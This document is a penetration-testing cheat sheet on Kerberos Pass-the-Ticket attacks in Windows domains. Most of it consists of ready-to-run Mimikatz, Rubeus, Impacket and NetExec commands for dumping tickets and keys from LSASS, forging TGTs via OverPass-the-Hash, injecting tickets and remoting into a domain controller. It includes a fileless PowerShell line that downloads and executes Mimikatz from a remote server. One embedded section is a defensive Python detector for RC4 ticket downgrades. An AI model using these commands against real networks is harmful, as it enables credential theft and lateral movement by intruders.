Pass the Ticket (PtT)
Pass-the-Ticket (PtT) is a post-exploitation technique in which an attacker uses a valid Kerberos ticket (such as a Ticket Granting Ticket, TGT) to authenticate to services without needing the user's password. This method exploits stolen tickets to bypass normal authentication mechanisms in Windows environments.
PtT attacks typically target Kerberos-protected networks, allowing lateral movement and privilege escalation.
To perform a Pass-the-Ticket (PtT) attack, we need one of two types of Kerberos tickets:
- TGS (Service Ticket): Grants access to a specific resource.
- TGT (Ticket Granting Ticket): Used to request service tickets for any resource the user has privileges for.
Harvesting Tickets
In Windows, the Local Security Authority Subsystem Service (LSASS) is responsible for processing and storing Kerberos tickets. LSASS manages authentication tokens, including TGTs and TGSs, in memory.
We can use tools like Mimikatz or Rubeus to harvest tickets from it.
Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
This exports the tickets as files with the .kirbi extension.
- Tickets whose account name ends with a $ belong to computer accounts, which need tickets of their own to communicate with Active Directory.
- User tickets include the username, followed by an @ and then the service name and domain.
Example: [random_value]-username@service-domain.tld.kirbi
Invoke-Mimikatz (Fileless)
IEX (New-Object Net.WebClient).DownloadString('http://<SELF-HOSTED-SERVER-IP>/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::list /export'
Rubeus
rubeus.exe dump /nowrap
With the /nowrap flag set, the tickets are printed as single-line Base64 strings that are easy to copy.
Forge our own tickets
The OverPass-the-Hash/Pass-the-Key method forges a Ticket-Granting Ticket (TGT) by using the user's Kerberos key (the RC4/NTLM hash or an AES key) to request a valid TGT instead of the password.
To do this, we first need the user's hash or key, which can be obtained with Mimikatz:
mimikatz.exe
privilege::debug
sekurlsa::ekeys
With access to the AES256_HMAC and RC4_HMAC keys, we can carry out the OverPass-the-Hash or Pass-the-Key attack using tools like Mimikatz and Rubeus.
Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::pth /domain:rezydev.xyz /user:rezydev /ntlm:<HASH/KEY-OBTAINED>
This opens a new cmd.exe window in which we can request access to any service as the target user.
Mimikatz requires administrative privileges for the Pass-the-Hash or Pass-the-Key attack.
Rubeus
rubeus.exe asktgt /domain:rezydev.xyz /user:rezydev /aes256:<HASH/KEY-OBTAINED> /nowrap
We can use any of the following keys/hashes: /rc4, /aes128, /aes256, or /des.
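A defender-side counterpart to the key types listed above, added here as an example and not part of the original notes: a TGT issued with RC4 or DES (Windows Security event 4768, Ticket Encryption Type 0x17/0x18/0x1/0x3) to an account that otherwise negotiates AES is the usual trace of a key replayed via OverPass-the-Hash/Pass-the-Key. The flattened key=value record format and the sample events are constructed for this example.

```python
import re

# "Ticket Encryption Type" codes as logged in Windows Security event 4768
# (Kerberos TGT requested); these are the standard Kerberos etype numbers.
ETYPE_NAMES = {"0x1": "DES-CBC-CRC", "0x3": "DES-CBC-MD5", "0x11": "AES128",
               "0x12": "AES256", "0x17": "RC4-HMAC", "0x18": "RC4-HMAC-EXP"}
# Legacy etypes. A TGT issued with one of these to an account that normally
# negotiates AES is the classic trace of a key replayed out of band
# (OverPass-the-Hash / Pass-the-Key with /rc4 or /des) rather than a logon.
WEAK_ETYPES = {"0x1", "0x3", "0x17", "0x18"}
FIELD_RE = re.compile(r"(\w+)=(\S+)")

# Constructed sample for this example: flattened 4768/4769 records, one per line.
SAMPLE_EVENTS = """\
EventID=4768 AccountName=rezydev ClientAddress=::ffff:10.10.10.50 TicketEncryptionType=0x12 ResultCode=0x0
EventID=4768 AccountName=rezydev ClientAddress=::ffff:10.10.10.99 TicketEncryptionType=0x17 ResultCode=0x0
EventID=4768 AccountName=WS01$ ClientAddress=::ffff:10.10.10.51 TicketEncryptionType=0x12 ResultCode=0x0
EventID=4769 AccountName=rezydev@REZYDEV.XYZ ClientAddress=::ffff:10.10.10.99 TicketEncryptionType=0x17 ResultCode=0x0
EventID=4768 AccountName=svc_legacy ClientAddress=::ffff:10.10.10.52 TicketEncryptionType=0x17 ResultCode=0x0
EventID=4768 AccountName=rezydev ClientAddress=::ffff:10.10.10.99 TicketEncryptionType=0x17 ResultCode=0x18
"""

def parse_event(line):
    """Turn one flattened 'key=value' record into a dict."""
    return dict(FIELD_RE.findall(line))

def successful_tgt_events(log_text):
    """Yield parsed 4768 events where the KDC actually issued a TGT (ResultCode 0x0)."""
    for ev in map(parse_event, log_text.splitlines()):
        if ev.get("EventID") == "4768" and ev.get("ResultCode") == "0x0":
            yield ev

def learn_baseline(log_text):
    """Map each account to the set of etypes its issued TGTs have used."""
    baseline = {}
    for ev in successful_tgt_events(log_text):
        baseline.setdefault(ev["AccountName"], set()).add(ev["TicketEncryptionType"])
    return baseline

def find_downgraded_tgts(log_text, baseline):
    """Flag issued TGTs with a weak etype for accounts that also negotiate AES."""
    findings = []
    for ev in successful_tgt_events(log_text):
        etype = ev["TicketEncryptionType"]
        seen = baseline.get(ev["AccountName"], set())
        # Accounts whose TGTs have only ever used RC4 (legacy service accounts) are
        # noise here and belong on a separate review list; unknown accounts are flagged.
        if etype in WEAK_ETYPES and not (seen and seen <= WEAK_ETYPES):
            findings.append((ev["AccountName"], ev["ClientAddress"], ETYPE_NAMES[etype]))
    return findings
```

Calling find_downgraded_tgts(SAMPLE_EVENTS, learn_baseline(SAMPLE_EVENTS)) flags only the RC4 TGT for rezydev, an account whose other TGTs use AES256; the failed request (ResultCode 0x18) and the RC4-only service account are left out.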
Pass the Ticket (PtT) - Windows
Rubeus
Instead of extracting a key/hash to forge our ticket, we could use the /ptt flag with Rubeus to submit the TGT or TGS directly to the current logon session.
rubeus.exe asktgt /domain:rezydev.xyz /user:rezydev /rc4:<HASH/KEY-OBTAINED> /ptt
rubeus.exe ptt /ticket:FILE.kirbi
# Convert a .kirbi file to Base64 (PowerShell)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("FILE.kirbi"))
# Or use the Base64 output from Rubeus directly
rubeus.exe ptt /ticket:<BASE64-ENCODED-TICKET>
Mimikatz
mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\rezydev\Desktop\FILE.kirbi"
Instead of using cmd.exe to open Mimikatz and import the ticket, we can use the misc::cmd module to launch a new command prompt with the ticket.
PowerShell Remoting
To use PowerShell Remoting with Pass-the-Ticket, import the ticket with Mimikatz and then connect to the target machine using PowerShell.
mimikatz.exe
kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\FILE.kirbi"
exit
powershell -ep bypass # or just 'powershell'
Enter-PSSession -ComputerName DC01
Rubeus has the createnetonly option, which creates a sacrificial logon session (logon type 9), similar to runas /netonly, so that the TGT of our current session is not overwritten when we import a new ticket. By default the new process is hidden; the /show flag makes its window visible.
rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
# The above command will open a new cmd window.
rubeus.exe asktgt /user:rezydev /domain:rezydev.xyz /aes256:<HASH/KEY-OBTAINED> /ptt
powershell -ep bypass # or just 'powershell'
Enter-PSSession -ComputerName DC01
Pass the Ticket (PtT) - Linux
We can request a TGT with the user's credentials using Impacket's getTGT.py tool:
python3 /path/to/getTGT.py rezydev.local/jethalal:'Pass123@' -dc-ip 10.10.10.10
# This saves the ticket to a jethalal.ccache file
# Set the 'KRB5CCNAME' environment variable to point to that file
export KRB5CCNAME=/path/to/jethalal.ccache
# Tools like NetExec can then use the ticket cache with the following flag
nxc smb 10.10.10.10 --use-kcache
nxc ldap 10.10.10.10 --use-kcache
# Note: for mssql, map the target's IP to its hostname and domain in /etc/hosts